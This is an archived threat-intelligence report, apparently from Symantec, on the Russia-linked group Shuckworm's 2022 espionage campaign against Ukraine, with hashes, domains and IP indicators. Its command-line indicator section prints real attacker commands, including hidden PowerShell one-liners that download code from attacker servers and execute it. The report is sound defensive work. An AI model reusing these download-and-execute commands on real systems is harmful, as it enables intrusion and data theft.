{
	"id": "edb70eb7-a30b-4f52-8694-2304ff597e88",
	"created_at": "2026-04-06T00:14:23.978389Z",
	"updated_at": "2026-04-10T13:13:10.379308Z",
	"deleted_at": null,
	"sha1_hash": "3af099ac62509fc210625d28a1e733d38f2b4ad0",
	"title": "Shuckworm: Russia-Linked Group Maintains Ukraine Focus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74223,
	"plain_text": "Shuckworm: Russia-Linked Group Maintains Ukraine Focus\r\nArchived: 2026-04-05 18:04:45 UTC\r\nUPDATE, 17.40 BST, August 15, 2022: Update for clarity re use of VCD, ASC, and H264 file extensions in file names.\r\nUPDATE, 17.50 BST, August 17, 2022: Additional IOCs added\r\nRecent Shuckworm activity observed by Symantec, a division of Broadcom Software, and aimed at Ukraine appears to be\r\ndelivering information-stealing malware to targeted networks. This activity was ongoing as recently as August 8, 2022 and\r\nmuch of the activity observed in this campaign is consistent with activity that was highlighted by CERT-UA on July 26.\r\nThe activity observed by Symantec began on July 15, and we have additional indicators of compromise (IOCs) and technical\r\ndetails to share about this campaign.\r\nShuckworm (aka Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on\r\nUkraine since it first appeared in 2014. It is generally considered to be a state-sponsored espionage operation.\r\nInfection Vector\r\nThe first suspicious activity Symantec saw on victim systems was a self-extracting 7-Zip file, which was downloaded via the\r\nsystem’s default browser. Subsequently, mshta.exe downloaded an XML file, which was likely masquerading as an HTML\r\napplication (HTA) file.\r\nThese files were downloaded from the following domain: a0698649[.]xsph[.]ru. It has been publicly documented since May\r\n2022 that subdomains of xsph[.]ru are associated with Shuckworm activity, and this domain was once again mentioned in\r\nCERT-UA’s July 26 publication about Shuckworm activity.\r\nThis domain was also associated with an email that spoofed being from the Security Service of Ukraine and had\r\n“Intelligence Bulletin” in the subject line, according to CERT-UA. 
This being the case, it is most likely the 7-Zip file seen on\r\nvictim networks in the campaign observed by Symantec was delivered to victims via email.\r\nAttack Chain\r\nThe downloading of the XML file onto victim networks was followed by the execution of a PowerShell stealer. We saw\r\nthree versions of the same PowerShell stealer appear on the one system. It’s possible the attackers may have deployed\r\nmultiple versions of the stealer, which were all very similar, as an attempt to evade detection.\r\nTwo VBS downloaders that had the words “juice” and “justice” in their file names were also observed on victim machines.\r\nAnalysis found that these were Backdoor.Pterodo, a well-known Shuckworm tool that Symantec blogged about earlier this\r\nyear. These scripts are capable of calling PowerShell, uploading screenshots, and also executing code downloaded from a\r\ncommand-and-control (C\u0026C) server.   \r\nVarious suspicious files containing “ntuser” in the file names were also seen on victim machines. We associate these\r\n“ntuser” files with Shuckworm activity, and many variants of them are malicious, with most detected as the Giddome\r\nbackdoor, another well-known Shuckworm tool.\r\nWe saw various parent processes with file names that had VCD, H264 and ASC extensions. A file named\r\nntuser.dat.tmcontainer.vcd was the parent process for a Giddome backdoor variant named ntuser.dat.tm.descendant.exe that\r\nwas seen on victim machines. A suspicious file named ntuser.dat.tmcontainer.h264 had a child process named\r\nntuser.dat.tm.declare.exe, another malicious Giddome backdoor binary. Elsewhere, a file named ntuser.dat.tmcontainer.asc\r\nhad a child process named ntuser.dat.tm.decay.exe.\r\nVCD files are disc images of a CD or DVD and are recognized by Windows as an actual disc, similar to ISO files, which we\r\ncommonly see malicious actors use to deliver payloads. 
An ASC file is an encrypted file that may contain text or binary\r\ninformation encoded as text, while an H264 file is a video file. However, filenames with the ntuser.dat.tmcontainer prefix\r\nare files that represent the registry.\r\nIt’s not clear if these are the actual file types, or if the attackers are using these file names as a means of sowing confusion.\r\nThe backdoor dropped on victim systems had the file name 4896.exe. This backdoor had multiple capabilities, including:\r\nRecord audio using the microphone and upload the recorded files to a remote location\r\nTake screenshots and upload them\r\nLog and upload keystrokes\r\nDownload and execute .exe files or download and load DLL files\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nPage 1 of 5\n\nThe legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk were both also leveraged by the attackers\r\nfor remote access. Legitimate RDP tools like these and others are frequently leveraged for remote access by attackers in both\r\nransomware and nation-state-backed cyber attacks.\r\nShuckworm Keeps Focus on Ukraine \r\nThis campaign, combined with previous public reporting on Shuckworm, shows some patterns in the operations of the group\r\nat the moment, including its reuse of patterns, e.g. paths (such as csidl_profile\\music), using files that contain \"ntuser.dat\" in\r\nthe file name, using various artifacts that contain, for example, \"judgement\" in the file name, and also leveraging EXE files\r\nwhose file names contain English words that begin with \"D\", “dat”, “decay”, “deer”, “declare”, etc.\r\nAs the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to\r\nbe continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure\r\ndoes not deter the group from its activities. 
While Shuckworm is not necessarily the most tactically sophisticated espionage\r\ngroup, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSHA256 files\r\nabb6aab63b29610dbc0a6d634b6777ff0a2a2b61c5f60bd09b0c3aa3919fa00d\r\n63490fc0828f9683f5dd5799452d684dcc32db28d683943b2bad5b56eee6f03e\r\nb66cc523b88505cc2cc0568e97c9a80b1ceae448c8ac7d7b0d9c0f36378d8c2f\r\n26fcfbbfe4deeae3797bc7999c641f7a93e5a7eb378cf998069d88060801c47d\r\n1f8a4cf57052e66d4de953fcda3aca627308f93b6560934959d745ca6dda66d9\r\n1aceb88288dd40535fdddcbdc1aa174109fe897122d693280d6ccec827f4df0b\r\nea4ba2c43bc3d18e5d01168ff4f864cbf727e3cb8b9cce5c3f75a27c91d63d84\r\n9da410a62fb552a593b6da8ee89aa451efb6efcd1f3a35fab24e3c04fec84030\r\n420fccd78efe1e4739c3a694afada023e1ce425c29a0affa91bf02c16912d143\r\ne5f34a99d6799c4ff3a4b06e4f42ff136c1a0f59dd4629f3e4da3a7a93e7c88e\r\nd358e4b6afd14fd7b058e0deaeca0bf3537edc264ef7674c1c49db35b82b2d24\r\nf151d2b404315afe4951cbd870866e8fbb11d05d3752ad096bf00d68072d2262\r\nf1c65464f2a86cb6ad6c6792c7553d4162849b5a229fcc396c737edffdb1ee80\r\nc40aaaecb9331f1ddac9fe9b6d3455ecfd7b21b53159453f7fa3a82e3d5f9ecc\r\n2c7943730f3dfb89f534fcb137a4f6e53a7a697309e6cc247f0f9800f1460731\r\nb783b82e846bd8a623ca32982585cf8b79ce7cbf9988a041f7b2ac7fe5f8a7fe\r\n66d2b38589d08bbbe56b34b88bcefc702cdc6593c71e5ee446dbbb115336b876\r\nac862717600c531846895f8884841d23e52c8332e708ca11c17a5c162ce43432\r\nb9c8ec91559a62baf87305e0ee387bb777da7830a6d9fc72c630e873858ec465\r\nd7d4077af0aff349821f0e964f42db5ab09eb8b2f427f266378aaa1d28af6c57\r\n3f3667294731e3bdbf13d96d32a98342e225601f20157f774917d9147ce692a4\r\n597c517c81a53f7a32a67eb2b15e51a95b6bfdd4a33b11850b08eccf6e29d098\r\n184b5ff96d90a46ad33ba82faa2bb298282e7c
35afc0ab96f884f668ad098e61\r\n20b1f6fec7a0f09c64e7e09de7952b7532f8c9cd4b45177d2125d84c6a40ec73\r\n8cbae307b9efdb760cc97468ee7a363d5204559ab21e7982d63867cc13c6b098\r\n92953773c3b405f341df8e68bd8a23cbc9b8fd6c708082aab91632d6cb84bac2\r\n8a5933f7248d1cf2dba19980efaf4f5d5b139563a22cec81df276661c0146450\r\n22ddb97a23a9010b445b08a807b22a997174f528e87604be0bba4e0ccfa18050\r\nb26e8d55828dc8143b68ef6140eab7e5e7e59e6b9e104e032b28f5058a127d51\r\nefd099e4900b692a362cf29a12cd2a100a99b1dd29cfaac4b456808795c07b0f\r\n3fc80fcbf9e813d00af3f54714f79d7accd3888689ac6c5d02a750d804f4e5c3\r\n30761d0a9b08c69cfdd135c69a537aef0df516b097cd9d6a0d9528bc907f4ddd\r\naa97a858124fb47ea2572a197bd762da9c19bac91bdd4c17469c2e48480e8088\r\n3790ddd924b08942f3ecb6da5a32df090274b90829e651f984f287c00db04592\r\n02963acfa5622901de83cb75fad5bef35902d0ae42310d47f7433379dd3543e8\r\n6461d0693801d8d523df9d2d0cd5a652d72c10acec8fab7344bb141c459543e1\r\n8b1e48dfab33ed67f8ccd788904f2cd4be521ff152a477cec4baba52b56aec15\r\n5f05ba566a66531b988c5a1dceee0b4a7bc2dc34ad2b68d984486e02891a4f6c\r\n3dc83f72a830c54980738467fb36e7b6b5da80e0d9657bd440dcad46ae9f96a2\r\nf895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm\r\nPage 2 of 5\n\n71fdd0edf4699051f5506f34f2663938faeca9400dae1c034ddb6b710d41c7d7\r\n4b9023dbaadd588dad670c49e5a202ae695e12689618f926249d49a935c07315\r\nef7eb27e19d11894b52148fbe8987b5726ef4390a56aa47a9a4bbe4b17dd0876\r\nHost IOCs\r\nntuser.dat.tm.declare.exe / 2d0792d3f9d5a921a2d5b476feb88a345869d2f0d95f7342cc10ac1c838896cb\r\njury.mp3 / 4a2b252eccab7da63aadb7a5539cc4ed8385d7bf258c325dea60ed0edc3e0e25\r\njoy.dat / b62bf1a504a474e259d78fc3349eed94982d6bf6af6012e23a1ec14b3d156dc9\r\ndo594e.tmp / 09709be5f7cbb076166d004265a378504f05832ba461f59181b96b374c31a4b3\r\ncronos.exe / c3b7a1a739e3641147f4c10c5acfbc5816c12892b0edbe8038928f236f44ec84\r\ndelve.prj / 
fd61dee37bafb3392fa4450d2afef18cf6b4b3fc5c87476de128c999e58cae59\r\n3893.bmp.vbs / c0a317f60910eed08bbfc7b3ac6e6de1b2029bf4922d0b0d7d3759313a24b16c\r\nNetwork IOCs\r\ndestroy.asierdo[.]ru\r\nhxxp://destroy.asierdo[.]ru/\r\n45.63.94[.]49\r\n165.22.215[.]30\r\n149.28.99[.]187\r\n45.63.79[.]134\r\n140.82.58[.]157\r\n139.180.172[.]67\r\n141.164.45[.].236\r\n95.179.167[.]182\r\n140.82.47[.]97\r\n159.223.235[.]224\r\n138.68.254[.]91\r\n217.163.30[.]126\r\n144.202.54[.]111\r\n159.89.129[.]22\r\n207.246.80[.]1\r\nhxxp://159.223.235[.]224/crab/crevice.elg\r\na0698649.xsph[.]ru\r\nhxxp://a0698649.xsph[.]ru/preparations/band.xml\r\n157.245.99[.]132\r\nhxxp://157.245.99[.]132/get.php\r\n194.180.174[.]73\r\nhxxp://194.180.174[.]73/1.txt\r\n*.pasamart[.]ru\r\n155.138.252[.]221\r\nhxxp://155.138.252[.]221/get.php\r\n68.183.9[.]9\r\nhxxp://68.183.9[.]9/get.php\r\nmotoristo.ru\r\n178.62.108[.]75\r\nhxxp://motoristo[.]ru/get.php\r\nheato[.]ru\r\n140.82.54[.]136\r\nhxxp://heato[.]ru/index.php\r\nleonardis[.]ru\r\n104.238[.]187.145\r\n141.8.192[.]82\r\n139.59.65[.]168 \r\nhxxp://139.59.65[.]168/journal.au\r\n45.63.100[.]72\r\nhxxp://45.63.100[.]72/get.php?fr=3126424\u0026se=3089412\u0026dl=hxxps://meta[.]ua/uk/news/politics/52320-ukrayina-rozshirila-oboronnu-spivpratsyu-z-danieyu/\u0026rm=hxxps://meta[.]ua/uk/\u0026kf=false\u0026ts=5875621\u0026dw=2240\u0026dh=1951\u0026t=2053953\u0026s=stable\u0026eec=3242252\u0026po=6485826\u0026ju=8204688\u0026kio\r\n199.247.25[.]79\r\nhxxp://199.247.25[.]79/get.php\r\nCommand lines\r\nCSIDL_PROFILE\\appdata\\local\\temp\\1645694127.exe\r\nCSIDL_PROFILE\\downloads\\anydesk (2).exe\r\nCSIDL_PROFILE\\ntuser.dat.tm.decay.exe\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y 
CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c del /f /q CSIDL_PROFILE\\29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003e\u003eC:\\Users\\User\\29630.ico\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003eC:\\Users\\User\\29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '17634.bmp\u003e\u003e CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo '5491.bmp\u003e\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c rename CSIDL_PROFILE\\29630.ico 29630.ico.txt\r\nCSIDL_SYSTEM\\cmd.exe /c rename CSIDL_PROFILE\\29630.ico.txt 29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\29630.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\mshta.exe hxxp://a0698649.xsph[.]ru/preparations/band.xml /f\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe -nol -nop echo (INVOKE-EXPRESSION(new-object\r\nnet.webclient).downloadstring('hxxp://157.245.99[.]132/get.php')) | powershell -\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe -windowstyle hidden -nologo Invoke-Expression $env:Include\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $aaa = (New-Object\r\nsystem.Net.WebClient).downloadString('hxxp://194.180.174[.]73/1.txt'); iex $aaa;\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $ip = [System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.pasamart.ru');Start-Sleep -s 10;$IE1 = New-Object -COMObject 
InternetExplorer.Application -Property\r\n@{Navigate2=$([string]$ip+'/lnk.php'); Visible = $False};while ($IE1.ReadyState -ne 4) {Start-Sleep 2};$Doc =\r\n$IE1.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $IE1.document,\r\n$Null).InnerHtml;$IE1.quit();[io.file]::WriteAllText($($env:USERPROFILE+'\\index.txt'),$Doc); iex(iex $Doc)\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $tmp = $(New-Object\r\nnet.webclient).DownloadString('hxxp://155.138.252[.]221/get.php'); Invoke-Expression $tmp\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $tmp = $(New-Object\r\nnet.webclient).DownloadString('hxxp://68.183.9[.]9/get.php'); Invoke-Expression $tmp\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\29630.ico.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\17634.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\ho2btvivw2m.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\ntuser.dat.tmcontainer.asc //e:vbscript /deserve /decidedly /dene //b\r\nCSIDL_SYSTEMX86\\windowspowershell\\v1.0\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_PROFILE\\appdata\\local\\temp\\7zsfx000.cmd \r\nCSIDL_SYSTEM\\cmd.exe /c start /min  powershell -w hidden -c (iex echo (iex (new-object\r\nnet.webclient).downloadstring('hxxp://motoristo[.]ru/get.php'))|powershell - )\r\nCSIDL_WINDOWS\\explorer.exe\r\npowershell -w hidden -c (iex echo (iex (new-object\r\nnet.webclient).downloadstring('hxxp://motoristo[.]ru/get.php'))|powershell - )\r\npowershell -w hiddeN -c (iex echo (iex (new-object\r\nnet.webclient).downloadstring('hxxp://sacramentos[.]ru/get.php'))|powershell - )\r\nwscript.exe CSIDL_PROFILE\\ntuser.dat.tmcontainer.asc //e:vbscript /deserve /decidedly /dene //b\r\nwscript.exe CSIDL_PROFILE\\documents\\jury.mp3 jenny //e:VBScript //b 
joke\r\nCSIDL_PROFILE\\cronos.exe\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '3893.bmp\u003e\u003e CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe -nol -nop $nwc = new-object\r\nnet.webclient;$nwc.headers['Accept']='image/avif,image/webp,*/*';$nwc.headers['Accept-Encoding']='*';$nwc.headers['Accept-Language']='en-US,en;q=0.5';$nwc.headers['Alt-Used']='www.facebook.com';$nwc.headers['Referer']='https://meta.ua/';$nwc.headers['Sec-Fetch-Dest']='document';$nwc.headers['Sec-Fetch-Mode']='no-cors';$nwc.headers['Sec-Fetch-Site']='cross-site';$nwc.headers['TE']='trailers';$nwc.headers['User-Agent']='Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0)\r\nGecko/20100101 Firefox/101.0';$code=\r\n([system.text.encoding]::utf8.getstring($nwc.DownloadData('http://45.63.100.72/get.php?\r\nfr=3126424\u0026se=3089412\u0026dl=https://meta.ua/uk/news/politics/52320-ukrayina-rozshirila-oboronnu-spivpratsyu-z-danieyu/\u0026rm=https://meta.ua/uk/\u0026kf=false\u0026ts=5875621\u0026dw=2240\u0026dh=1951\u0026t=2053953\u0026s=stable\u0026eec=3242252\u0026po=6485826\u0026ju=8204688\u0026kio=f\r\n$code|iex\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell.exe $tmp = $(New-Object\r\nnet.webclient).DownloadString('http://199.247.25.79/get.php'); Invoke-Expression $tmp\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\3893.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\delve.prj //e:vbscript /departments /dependant 
/despite //b\r\nCSIDL_SYSTEM\\cmd.exe /c CSIDL_PROFILE\\appdata\\local\\temp\\7zsfx000.cmd \r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c copy /y CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp\r\nCSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c del /f /q CSIDL_PROFILE\\30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c del /f /q CSIDL_PROFILE\\8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo .\u003e CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003eC:\\Users\\User\\30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c echo '\u003eC:\\Users\\User\\8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c rename 
CSIDL_PROFILE\\30802.ico.txt 30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c rename CSIDL_PROFILE\\8527.ico.txt 8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\30802.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\8527.ico.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\cmd.exe /c start /b CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\30802.ico.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\8527.ico.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\10805.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\14612.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\19084.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\20342.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\26012.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\5275.bmp.vbs\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\5491.bmp.vbs\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm"
	],
	"report_names": [
		"russia-ukraine-shuckworm"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434463,
	"ts_updated_at": 1775826790,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3af099ac62509fc210625d28a1e733d38f2b4ad0.pdf",
		"text": "https://archive.orkl.eu/3af099ac62509fc210625d28a1e733d38f2b4ad0.txt",
		"img": "https://archive.orkl.eu/3af099ac62509fc210625d28a1e733d38f2b4ad0.jpg"
	}
}